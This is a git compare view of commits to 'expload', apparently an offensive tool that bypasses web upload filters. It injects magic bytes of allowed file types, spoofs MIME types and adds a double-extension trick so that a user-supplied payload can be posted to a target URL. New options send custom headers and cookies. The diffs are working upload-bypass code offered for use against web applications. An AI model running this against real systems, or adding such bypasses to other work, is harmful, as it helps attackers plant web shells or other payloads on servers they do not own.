Compare commits

..

3 Commits

Author SHA1 Message Date
witchdocsec e827a58aa5
Update README.md 2024-09-24 20:36:02 +01:00
witchdocsec 06c11b96b6
Update parse.py 2024-09-24 20:34:54 +01:00
witchdocsec 6bab1015a7
Update expload.py
added double extension method and the ability to pass cookies and headers
2024-09-24 20:34:36 +01:00
3 changed files with 23 additions and 4 deletions

View File

@ -6,7 +6,7 @@ A tool for injecting magic bytes of allowed files, and spoofing the mime type. I
## useage
```
expload.py [-h] -u URL -p PAYLOAD -e EXT -n NAME -f FILENAME
expload.py [-h] -u URL -p PAYLOAD -e EXT -n NAME -f FILENAME [-d] [-h2] [-he HEADERS [HEADERS ...]] [-c COOKIES] [-r]
expload args
@ -19,4 +19,11 @@ options:
-n NAME, --name NAME field name for file upload
-f FILENAME, --filename FILENAME
file name to upload with
-d, --doubleextend spoofed extension inserted into filename
-h2, --http2 use http2 if supported
-he HEADERS [HEADERS ...], --headers HEADERS [HEADERS ...]
headers and keys colon seperated
-c COOKIES, --cookies COOKIES
cookies seperated by ; and wrapped in quotes
-r, --response display the response from the target webapp
```

View File

@ -14,7 +14,7 @@ def grabsig(ext):
def fileupload():
ext=args.ext
name=args.name
filename=args.filename
filename=args.filename if not args.doubleextend else ".".join(args.filename.split(".")[0:-1])+f".{args.ext}."+args.filename.split(".")[-1]
with open(args.payload,"r") as payload:
content=payload.read().encode("utf-8")
with tempfile.NamedTemporaryFile() as tmp:
@ -31,7 +31,7 @@ def fileupload():
with httpx.Client(http2=args.http2) as client:
try:
r = client.post(args.url, files=files)
r = client.post(args.url, files=files, headers=args.headers)
except httpx.ReadTimeout:
print("Error: Response timed out but file may have been uploaded")
@ -46,6 +46,8 @@ def fileupload():
exit()
print("file posted")
if args.response:
print(r.text)
if __name__ == "__main__":
args=exploadlib.parse.parser()

View File

@ -6,7 +6,17 @@ def parser():
parser.add_argument("-e", "--ext",required=True,help="extension to spoof")
parser.add_argument("-n", "--name",required=True,help="field name for file upload")
parser.add_argument("-f", "--filename",required=True,help="file name to upload with")
parser.add_argument("-d", "--doubleextend",action="store_true",help="spoofed extension inserted into filename")
parser.add_argument("-h2", "--http2",action="store_true",help="use http2 if supported")
parser.add_argument("-he", "--headers",help="headers and keys colon seperated",nargs="+")
parser.add_argument("-c", "--cookies",help="cookies seperated by ; and wrapped in quotes")
parser.add_argument("-r", "--response",action="store_true",help="display the response from the target webapp")
args = parser.parse_args()
if args.headers:
args.headers={header.split(":")[0]:header.split(":")[1] for header in args.headers}
if args.cookies:
args.headers["cookie"]=args.cookies
return args